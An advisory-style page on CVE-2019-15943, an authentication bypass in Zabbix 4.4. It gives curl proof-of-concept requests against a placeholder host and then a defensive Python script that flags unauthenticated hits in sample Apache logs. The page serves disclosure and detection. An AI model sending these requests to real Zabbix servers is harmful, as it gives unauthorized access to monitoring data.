Zabbix is an open-source monitoring tool for diverse IT components, including networks, servers, virtual machines (VMs) and cloud services. It collects monitoring metrics such as network utilization, CPU load and disk space consumption.
Security researcher Todor Donev found an authentication bypass in the popular system monitoring application Zabbix, enabling a third party to reach pages that should require a login. Zabbix is widely used for monitoring the availability of computer hosts, most commonly by internet service providers and software companies. The vulnerability was found in Zabbix 4.4 and has been assigned CVE-2019-15943.
Proof of concept
curl -i 'https://TARGET/zabbix/zabbix.php?action=dashboard.list'
curl -i 'https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1'
curl -i 'https://TARGET/zabbix/screens.php?ddreset=1'
curl -i 'https://TARGET/zabbix/report2.php?ddreset=1'
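For defenders, the request paths in the proof of concept above are what to look for in the web server logs of a Zabbix front end: a 200 response on one of those pages from a client that never posted to the login form is the signature of an unauthenticated hit. The following added example (not from the original advisory) scans constructed Apache Combined Log Format lines for exactly that; the log lines and IP addresses are made up, and the "no earlier POST to index.php" heuristic is an assumption that misses sessions created before the log window began.

```python
import re

# Paths and query markers taken from the CVE-2019-15943 proof of concept.
BYPASS_PATTERNS = [
    re.compile(r"/zabbix/zabbix\.php\?.*action=dashboard\.(list|view)"),
    re.compile(r"/zabbix/(screens|report2)\.php\?.*ddreset=1"),
]

# Apache Combined Log Format: client, identd, user, timestamp, request line, status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Return a dict of log fields, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_unauthenticated_hits(lines):
    """Return (ip, path) for successful (200) requests to the PoC endpoints
    made by clients with no earlier POST to /zabbix/index.php (the login form).
    A 302 redirect to the login page is the expected, healthy response."""
    logged_in = set()   # assumption: a POST to index.php marks the client as authenticated
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith("/zabbix/index.php"):
            logged_in.add(rec["ip"])
            continue
        if rec["status"] != "200" or rec["ip"] in logged_in:
            continue
        if any(p.search(rec["path"]) for p in BYPASS_PATTERNS):
            hits.append((rec["ip"], rec["path"]))
    return hits

# Constructed sample log: one client logs in first, the other never does.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2019:13:55:36 +0000] "POST /zabbix/index.php HTTP/1.1" 302 0',
    '198.51.100.7 - - [10/Oct/2019:13:55:40 +0000] "GET /zabbix/zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 200 51234',
    '203.0.113.9 - - [10/Oct/2019:14:02:01 +0000] "GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1" 200 20481',
    '203.0.113.9 - - [10/Oct/2019:14:02:05 +0000] "GET /zabbix/screens.php?ddreset=1 HTTP/1.1" 200 9876',
    '203.0.113.9 - - [10/Oct/2019:14:02:09 +0000] "GET /zabbix/report2.php?ddreset=1 HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, path in find_unauthenticated_hits(SAMPLE_LOG):
        print(f"unauthenticated access: {ip} -> {path}")
```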